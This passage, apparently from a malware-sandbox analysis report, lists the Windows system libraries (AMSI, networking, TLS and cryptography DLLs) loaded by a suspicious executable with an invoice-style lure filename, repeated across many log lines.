                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??l.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??l.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ieproxy.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ieproxy.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ieproxy.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: mssip32.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: mssip32.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: mssip32.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: smartscreenps.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: smartscreenps.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: smartscreenps.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: winhttpcom.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeSection loaded: amsi.dllJump to behavior
